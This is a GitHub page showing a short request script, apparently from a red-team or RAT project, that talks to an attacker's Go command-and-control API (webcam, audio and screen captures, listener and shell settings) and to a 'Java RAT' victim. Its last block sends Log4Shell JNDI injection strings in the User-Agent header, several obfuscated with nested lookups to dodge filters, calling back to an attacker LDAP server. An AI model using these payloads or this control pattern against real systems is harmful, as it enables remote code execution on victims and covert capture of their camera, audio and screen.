-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathrequester.py
executable file
·47 lines (43 loc) · 1.63 KB
/
requester.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
###env
red_url = 'http://192.168.113.9'
victim_url = 'http://192.168.113.13:58860'
go_url = red_url + ':2080'
apache2_url = red_url + ':2022'
###env
#// RED |
### Go API |
### ----------- |
get(go_url + '/'); # GET root endpoints
get(go_url + '/captures'); # GET captures
post(go_url + '/captures', json = { # POST captures
"TYPE":"WEBCAM/AUDIO/SCREEN",
"TITLE":"SAMPLE",
"TIMESTAMP":"07/14/22 12:59:02",
"ENCODING":
{
"EXTENSION": "jpeg/wav/png",
"BASE32":"KNAU2UCMIUFA===="
}
});
get(go_url + '/properties'); # GET properties
patch(go_url + '/properties', json = { # PATCH properties
"HOST": "192.168.159.9",
"PORT_JAVA_HTTP": "",
"PORT_LISTENER": "",
"SHELL": ""
});
### Apache2 HTTP |
### ------------ |
get(apache2_url + '/'); # GET root
#// VCITIM |
### Java RAT API |
### ----------- |
get(victim_url); # GET root payload
get(victim_url, headers = { # GET root payload (custom header)
# 'User-Agent': '${java:runtime}'
# 'User-Agent': '${java:version}'
# 'User-Agent': '${env:PATH}'
# 'User-Agent': '${jndi:ldap://192.168.159.9:2038/cn=1807422020,dc=attacker,dc=com}'
# 'User-Agent': '${${lower:${lower:jndi}}:${lower:${::-l}${::-d}${::-a}${::-p}}://192.168.159.9:2038/cn=1807422020,dc=attacker,dc=com}'
'User-Agent': '${${env:PATH_DUMMY:-j}nd${sys:SYS_DUMMY:-i}:${lower:${::-l}${::-d}${::-a}${::-p}}://192.168.113.9:2038/cn=1807422020,dc=attacker,dc=com}'
});